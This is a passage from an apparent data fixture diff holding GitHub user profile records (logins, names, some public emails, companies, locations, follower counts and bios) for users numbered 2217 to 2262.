"location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2017-12-11T12:53:25Z", + "updated_at": "2023-07-19T12:39:22Z", + "node_id": "MDQ6VXNlcjM0NDQ2MTc5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2217, + "fields": { + "nest_created_at": "2024-09-12T01:11:49.723Z", + "nest_updated_at": "2024-09-22T19:36:14.263Z", + "name": "eNI", + "login": "enidevops", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/44378292?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2018-10-22T18:43:45Z", + "updated_at": "2024-07-28T08:51:37Z", + "node_id": "MDQ6VXNlcjQ0Mzc4Mjky", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2218, + "fields": { + "nest_created_at": "2024-09-12T01:11:50.943Z", + "nest_updated_at": "2024-09-22T19:42:12.594Z", + "name": "manuelsommer", + "login": "manuel-sommer", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/47991713?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 11, + "public_gists_count": 0, + "public_repositories_count": 19, + "created_at": "2019-02-25T20:12:52Z", + "updated_at": "2024-05-21T06:56:36Z", + "node_id": "MDQ6VXNlcjQ3OTkxNzEz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2219, + "fields": { + "nest_created_at": "2024-09-12T01:11:52.179Z", + "nest_updated_at": "2024-09-12T01:11:52.179Z", + "name": "", + "login": "advidsec", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26964967?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2017-04-06T12:00:41Z", + "updated_at": "2024-05-16T11:26:21Z", + "node_id": "MDQ6VXNlcjI2OTY0OTY3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2220, + "fields": { + "nest_created_at": "2024-09-12T01:11:54.688Z", + "nest_updated_at": "2024-09-22T19:35:14.798Z", + "name": "Felix Hoeborn", + "login": "fhoeborn", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/98820380?v=4", + "company": "BioNTech SE", + "location": "Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2022-02-01T12:50:27Z", + "updated_at": "2024-08-14T20:57:01Z", + "node_id": "U_kgDOBePhHA", + "bio": "", + "is_hireable": false, + "twitter_username": "FHoeborn" + } +}, +{ + "model": "github.user", + "pk": 2221, + "fields": { + "nest_created_at": "2024-09-12T01:11:57.269Z", + "nest_updated_at": "2024-09-12T01:11:57.269Z", + "name": "", + "login": "xoda", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5850473?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2013-11-04T12:13:49Z", + "updated_at": "2024-05-17T10:52:59Z", + "node_id": "MDQ6VXNlcjU4NTA0NzM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2222, + "fields": { + "nest_created_at": "2024-09-12T01:11:59.815Z", + "nest_updated_at": "2024-09-12T01:11:59.815Z", + "name": "ilomax", + "login": "ilomax", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/24372477?v=4", + "company": "", + "location": "France.", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2016-12-04T15:59:48Z", + "updated_at": "2024-07-04T12:05:57Z", + "node_id": "MDQ6VXNlcjI0MzcyNDc3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2223, + "fields": { + "nest_created_at": "2024-09-12T01:12:01.090Z", + "nest_updated_at": "2024-09-12T01:12:02.338Z", + "name": "Saher Delgado", + "login": "saheredelgadom", + "email": "saherdelgado@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/26166135?v=4", + "company": "Evolution Systems C.A.", + "location": "World", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2017-03-03T13:27:38Z", + "updated_at": "2024-07-30T16:17:35Z", + "node_id": "MDQ6VXNlcjI2MTY2MTM1", + "bio": "Python Developer, Bash, Linux Expert and Testing Security", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2224, + "fields": { + "nest_created_at": "2024-09-12T01:12:03.574Z", + "nest_updated_at": "2024-09-12T01:12:03.574Z", + "name": "Lucas Montiel", + "login": "lcsmontiel", + "email": "lcsmontiel@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6759544?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 4, + "public_gists_count": 2, + "public_repositories_count": 8, + "created_at": "2014-02-22T22:34:26Z", + "updated_at": "2023-05-30T19:26:36Z", + "node_id": "MDQ6VXNlcjY3NTk1NDQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2225, + "fields": { + "nest_created_at": "2024-09-12T01:12:06.066Z", + "nest_updated_at": "2024-09-22T19:35:52.132Z", + "name": "Daniel Velardez", + "login": "dvelardez", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11647838?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2015-03-25T12:48:40Z", + "updated_at": "2024-08-07T15:21:34Z", + "node_id": "MDQ6VXNlcjExNjQ3ODM4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2226, + "fields": { + "nest_created_at": "2024-09-12T01:12:06.958Z", + "nest_updated_at": "2024-09-22T18:48:25.512Z", + "name": "Nathan Voss", + "login": "njv299", + "email": "njvoss299@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/210219?v=4", + "company": "Finite State, Inc.", + "location": "Prescott, AZ", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 29, + "public_gists_count": 5, + "public_repositories_count": 4, + "created_at": "2010-02-24T20:27:03Z", + "updated_at": "2024-03-26T21:33:08Z", + "node_id": "MDQ6VXNlcjIxMDIxOQ==", + "bio": "Senior Engineer and Cyber Researcher at Finite State Inc, an IoT security company", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2227, + "fields": { + "nest_created_at": "2024-09-12T01:12:09.473Z", + "nest_updated_at": "2024-09-12T01:12:09.473Z", + "name": "", + "login": "stars693", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/33175562?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2017-10-28T10:05:43Z", + "updated_at": "2024-03-14T19:15:26Z", + "node_id": "MDQ6VXNlcjMzMTc1NTYy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2228, + "fields": { + "nest_created_at": "2024-09-12T01:12:10.759Z", + "nest_updated_at": "2024-09-12T02:31:04.793Z", + "name": "", + "login": "spmishra121", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6615148?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2014-02-07T11:46:10Z", + "updated_at": "2023-02-24T07:53:49Z", + "node_id": "MDQ6VXNlcjY2MTUxNDg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2229, + "fields": { + "nest_created_at": "2024-09-12T01:12:12.024Z", + "nest_updated_at": "2024-09-22T19:35:29.587Z", + "name": "Alejandro Mendiondo", + "login": "devsecopsale", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/80888956?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2021-03-18T09:54:42Z", + "updated_at": "2024-08-08T12:47:20Z", + "node_id": "MDQ6VXNlcjgwODg4OTU2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2230, + "fields": { + "nest_created_at": "2024-09-12T01:12:14.533Z", + "nest_updated_at": "2024-09-12T01:12:14.533Z", + "name": "Matt Medus", + "login": "mattmedus", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/58269748?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-11-27T17:59:09Z", + "updated_at": "2024-07-08T21:36:00Z", + "node_id": "MDQ6VXNlcjU4MjY5NzQ4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2231, + "fields": { + "nest_created_at": "2024-09-12T01:12:15.358Z", + "nest_updated_at": "2024-09-12T01:12:15.358Z", + "name": "", + "login": "pmagnemi20", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/67282783?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2020-06-22T16:08:34Z", + "updated_at": "2024-09-09T11:31:37Z", + "node_id": "MDQ6VXNlcjY3MjgyNzgz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2232, + "fields": { + "nest_created_at": "2024-09-12T01:12:16.620Z", + "nest_updated_at": "2024-09-12T01:12:16.620Z", + "name": "Bruno", + "login": "bruno561", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/65369082?v=4", + "company": "", + "location": "São Paulo - SP, Brazil", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 21, + "created_at": "2020-05-14T20:28:23Z", + "updated_at": "2024-07-26T18:41:56Z", + "node_id": "MDQ6VXNlcjY1MzY5MDgy", + "bio": "DevOps Engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2233, + "fields": { + "nest_created_at": "2024-09-12T01:12:17.867Z", + "nest_updated_at": "2024-09-12T01:12:17.867Z", + "name": "Jan Socha", + "login": "js0cha", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/92743635?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2021-10-18T15:56:49Z", + "updated_at": "2024-05-13T08:05:43Z", + "node_id": "U_kgDOBYcn0w", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2234, + "fields": { + "nest_created_at": "2024-09-12T01:12:20.344Z", + "nest_updated_at": "2024-09-12T01:12:20.344Z", + "name": "", + "login": "alexr3", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/84767766?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 78, + "created_at": "2021-05-25T07:26:04Z", + "updated_at": "2024-08-12T12:24:24Z", + "node_id": "MDQ6VXNlcjg0NzY3NzY2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2235, + "fields": { + "nest_created_at": "2024-09-12T01:12:21.182Z", + "nest_updated_at": "2024-09-12T01:12:43.874Z", + "name": "reddybhaskar", + "login": "reddybhaskarvengala", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26956032?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2017-04-06T07:07:56Z", + "updated_at": "2024-04-15T12:00:57Z", + "node_id": "MDQ6VXNlcjI2OTU2MDMy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2236, + "fields": { + "nest_created_at": "2024-09-12T01:12:22.416Z", + "nest_updated_at": "2024-09-12T01:12:22.416Z", + "name": "", + "login": "PKulkov", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/63711768?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-04-15T09:17:31Z", + "updated_at": "2023-01-13T19:05:46Z", + "node_id": "MDQ6VXNlcjYzNzExNzY4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2237, + "fields": { + "nest_created_at": "2024-09-12T01:12:23.646Z", + "nest_updated_at": "2024-09-22T19:36:16.804Z", + "name": "Ma1tobiose", + "login": "Ma1tobiose", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9525648?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 38, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 54, + "created_at": "2014-11-03T05:49:51Z", + "updated_at": "2024-09-22T11:38:35Z", + "node_id": "MDQ6VXNlcjk1MjU2NDg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2238, + "fields": { + "nest_created_at": "2024-09-12T01:12:27.370Z", + "nest_updated_at": "2024-09-12T01:19:37.338Z", + "name": "Giveen", + "login": "giveen", + "email": "ajaxx20020@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1180939?v=4", + "company": "", + "location": "Idaho", + "collaborators_count": 0, + "following_count": 17, + "followers_count": 17, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2011-11-08T15:21:19Z", + "updated_at": "2024-02-22T03:01:43Z", + "node_id": "MDQ6VXNlcjExODA5Mzk=", + "bio": "", + "is_hireable": true, + "twitter_username": "giveen" + } +}, +{ + "model": "github.user", + "pk": 2239, + "fields": { + "nest_created_at": "2024-09-12T01:12:30.698Z", + "nest_updated_at": "2024-09-12T02:07:46.755Z", + "name": "", + "login": "twright-0x1", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13889385?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2015-08-20T15:24:05Z", + "updated_at": "2024-08-09T13:54:55Z", + "node_id": "MDQ6VXNlcjEzODg5Mzg1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2240, + "fields": { + "nest_created_at": "2024-09-12T01:12:32.041Z", + "nest_updated_at": "2024-09-12T01:12:32.041Z", + "name": "", + "login": "nc-esi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/122610802?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-01-13T11:33:28Z", + "updated_at": "2023-01-13T11:33:28Z", + "node_id": "U_kgDOB07kcg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2241, + "fields": { + "nest_created_at": "2024-09-12T01:12:33.287Z", + "nest_updated_at": "2024-09-12T01:12:33.287Z", + "name": "", + "login": "surajram09", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/23093486?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2016-10-27T06:53:05Z", + "updated_at": "2024-04-17T04:12:42Z", + "node_id": "MDQ6VXNlcjIzMDkzNDg2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2242, + "fields": { + "nest_created_at": "2024-09-12T01:12:35.371Z", + "nest_updated_at": "2024-09-22T19:35:45.777Z", + "name": "", + "login": "nobletrout", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16596040?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 9, + "public_gists_count": 5, + "public_repositories_count": 47, + "created_at": "2016-01-07T15:54:18Z", + "updated_at": "2024-09-12T21:54:44Z", + "node_id": "MDQ6VXNlcjE2NTk2MDQw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2243, + "fields": { + "nest_created_at": "2024-09-12T01:12:36.752Z", + "nest_updated_at": "2024-09-12T01:12:36.752Z", + "name": "Omar Mochtar", + "login": "iomarmochtar", + "email": "iomarmochtar@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6241878?v=4", + "company": "", + "location": "Indonesia", + "collaborators_count": 0, + "following_count": 94, + "followers_count": 25, + "public_gists_count": 28, + "public_repositories_count": 38, + "created_at": "2013-12-22T15:42:10Z", + "updated_at": "2024-07-24T10:49:40Z", + "node_id": "MDQ6VXNlcjYyNDE4Nzg=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2244, + "fields": { + "nest_created_at": "2024-09-12T01:12:38.025Z", + "nest_updated_at": "2024-09-12T01:12:38.025Z", + "name": "", + "login": "Kedlix", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/39012231?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2018-05-05T18:07:28Z", + "updated_at": "2023-02-08T14:29:17Z", + "node_id": "MDQ6VXNlcjM5MDEyMjMx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2245, + "fields": { + "nest_created_at": "2024-09-12T01:12:38.862Z", + "nest_updated_at": "2024-09-22T19:27:25.069Z", + "name": "Tobias Stadler", + "login": "tobiasstadler", + "email": "ts.stadler@gmx.de", + "avatar_url": "https://avatars.githubusercontent.com/u/22965777?v=4", + "company": "", + "location": "Eitting, Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 27, + "created_at": "2016-10-20T18:40:15Z", + "updated_at": "2024-08-26T04:38:50Z", + "node_id": "MDQ6VXNlcjIyOTY1Nzc3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2246, + "fields": { + "nest_created_at": "2024-09-12T01:12:40.132Z", + "nest_updated_at": "2024-09-12T01:12:40.132Z", + "name": "", + "login": "sjs6776", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/103534016?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2022-04-12T19:41:51Z", + "updated_at": "2023-07-20T22:09:33Z", + "node_id": "U_kgDOBivNwA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2247, + "fields": { + "nest_created_at": "2024-09-12T01:12:41.353Z", + "nest_updated_at": "2024-09-12T01:14:29.698Z", + "name": "Ender Akbas", + "login": "enderax", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9071412?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 53, + "followers_count": 38, + "public_gists_count": 0, + "public_repositories_count": 16, + "created_at": "2014-10-08T07:21:59Z", + "updated_at": "2024-08-08T11:28:06Z", + "node_id": "MDQ6VXNlcjkwNzE0MTI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2248, + "fields": { + "nest_created_at": "2024-09-12T01:12:52.234Z", + "nest_updated_at": "2024-09-12T01:12:52.234Z", + "name": "Chaz", + "login": "cleong14", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13462818?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 51, + "followers_count": 40, + "public_gists_count": 12, + "public_repositories_count": 239, + "created_at": "2015-07-23T05:53:30Z", + "updated_at": "2024-09-10T05:41:22Z", + "node_id": "MDQ6VXNlcjEzNDYyODE4", + "bio": "Full Stack Application Security Engineer | Penetration Tester | Hunter of Bugs | Automation/SDET", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2249, + "fields": { + "nest_created_at": "2024-09-12T01:12:53.072Z", + "nest_updated_at": "2024-09-12T01:12:53.072Z", + "name": "", + "login": "Nimehalaa155", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/121023637?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-12-19T09:59:15Z", + "updated_at": "2023-11-29T11:01:09Z", + "node_id": "U_kgDOBzaslQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2250, + "fields": { + "nest_created_at": "2024-09-12T01:12:55.955Z", + "nest_updated_at": "2024-09-12T01:12:55.955Z", + "name": "Carlos E. Peña", + "login": "cpena002", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/22306833?v=4", + "company": "@flexion ", + "location": "", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2016-09-19T21:43:28Z", + "updated_at": "2024-05-07T23:52:55Z", + "node_id": "MDQ6VXNlcjIyMzA2ODMz", + "bio": "Getting better one console.log at a time. ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2251, + "fields": { + "nest_created_at": "2024-09-12T01:12:57.184Z", + "nest_updated_at": "2024-09-22T19:38:37.582Z", + "name": "Matt Tesauro", + "login": "mtesauro", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3422419?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 84, + "public_gists_count": 2, + "public_repositories_count": 41, + "created_at": "2013-01-30T00:36:40Z", + "updated_at": "2024-07-09T01:56:52Z", + "node_id": "MDQ6VXNlcjM0MjI0MTk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2252, + "fields": { + "nest_created_at": "2024-09-12T01:13:00.502Z", + "nest_updated_at": "2024-09-12T01:13:00.502Z", + "name": "", + "login": "nightshiba", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/49189362?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2019-04-02T09:05:58Z", + "updated_at": "2024-09-05T16:46:16Z", + "node_id": "MDQ6VXNlcjQ5MTg5MzYy", + "bio": "#bepis", + "is_hireable": false, + "twitter_username": "nightshiba" + } +}, +{ + "model": "github.user", + "pk": 2253, + "fields": { + "nest_created_at": "2024-09-12T01:13:01.725Z", + "nest_updated_at": "2024-09-12T01:13:01.725Z", + "name": "Joep", + "login": "joeppeeters", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3350917?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2013-01-23T09:12:17Z", + "updated_at": "2024-09-04T10:23:39Z", + "node_id": "MDQ6VXNlcjMzNTA5MTc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2254, + "fields": { + "nest_created_at": "2024-09-12T01:13:03.379Z", + "nest_updated_at": "2024-09-12T01:13:03.380Z", + "name": "Samuel Ibáñez Gómez", + "login": "ibanezgomez", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8628648?v=4", + "company": "", + "location": "Spain", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 13, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2014-09-02T13:48:35Z", + "updated_at": "2024-07-18T09:08:54Z", + "node_id": "MDQ6VXNlcjg2Mjg2NDg=", + "bio": "IT Engineer & VW Enthusiast", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2255, + "fields": { + "nest_created_at": "2024-09-12T01:13:06.545Z", + "nest_updated_at": "2024-09-22T19:34:00.107Z", + "name": "Daniel Kemper", + "login": "devsecopspaylouser", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/103608074?v=4", + "company": "Paylocity", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2022-04-13T21:28:08Z", + "updated_at": "2024-08-01T16:49:27Z", + "node_id": "U_kgDOBizvCg", + "bio": "Principal Development Security Operations Engineer.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2256, + "fields": { + "nest_created_at": "2024-09-12T01:13:07.827Z", + "nest_updated_at": "2024-09-12T01:13:07.827Z", + "name": "Asad Hussain", + "login": "Engr-Asad-Hussain", + "email": "asad.h1998@yahoo.com", + "avatar_url": "https://avatars.githubusercontent.com/u/57555839?v=4", + "company": "Working at Auxin Security", + "location": "Pakistan, Karachi", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 3, + "public_gists_count": 1, + "public_repositories_count": 56, + "created_at": "2019-11-09T07:12:04Z", + "updated_at": "2024-09-06T05:07:34Z", + "node_id": "MDQ6VXNlcjU3NTU1ODM5", + "bio": "Full Stack Developer - Python/Flask - JavaScript/React", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2257, + "fields": { + "nest_created_at": "2024-09-12T01:13:08.648Z", + "nest_updated_at": "2024-09-12T01:13:22.473Z", + "name": "Rustik", + "login": "sakyra01", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/57565730?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 46, + "created_at": "2019-11-09T14:32:49Z", + "updated_at": "2024-08-30T12:11:25Z", + "node_id": "MDQ6VXNlcjU3NTY1NzMw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2258, + "fields": { + "nest_created_at": "2024-09-12T01:13:09.510Z", + "nest_updated_at": "2024-09-22T19:35:41.009Z", + "name": "Karsten Siemer", + "login": "KarstenSiemer", + "email": "karsten.siemer@aetherize.com", + "avatar_url": "https://avatars.githubusercontent.com/u/40307978?v=4", + "company": "Aetherize", + "location": "Hamburg", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 11, + "public_gists_count": 0, + "public_repositories_count": 17, + "created_at": "2018-06-15T23:35:10Z", + "updated_at": "2024-09-18T11:31:16Z", + "node_id": "MDQ6VXNlcjQwMzA3OTc4", + "bio": "Freelance DevOps Engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2259, + "fields": { + "nest_created_at": "2024-09-12T01:13:10.852Z", + "nest_updated_at": "2024-09-12T01:13:10.852Z", + "name": "", + "login": "HelpMe-AC", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/136791298?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-06-16T07:19:55Z", + "updated_at": "2023-06-16T07:19:55Z", + "node_id": "U_kgDOCCdFAg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2260, + "fields": { + "nest_created_at": "2024-09-12T01:13:12.204Z", + "nest_updated_at": "2024-09-12T01:13:12.204Z", + "name": "Le Duc Lischetzke", + "login": "lischetzke", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6329950?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 19, + "created_at": "2014-01-06T12:56:38Z", + "updated_at": "2024-08-13T22:27:50Z", + "node_id": "MDQ6VXNlcjYzMjk5NTA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2261, + "fields": { + "nest_created_at": "2024-09-12T01:13:18.730Z", + "nest_updated_at": "2024-09-12T01:13:18.730Z", + "name": "", + "login": "breckwoldt", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/73230574?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-10-21T11:27:16Z", + "updated_at": "2022-04-05T10:14:15Z", + "node_id": "MDQ6VXNlcjczMjMwNTc0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2262, + "fields": { + "nest_created_at": "2024-09-12T01:13:19.578Z", + "nest_updated_at": "2024-09-12T01:13:19.578Z", + "name": "", + "login": "ankur-aggarwal0403", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/112920750?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 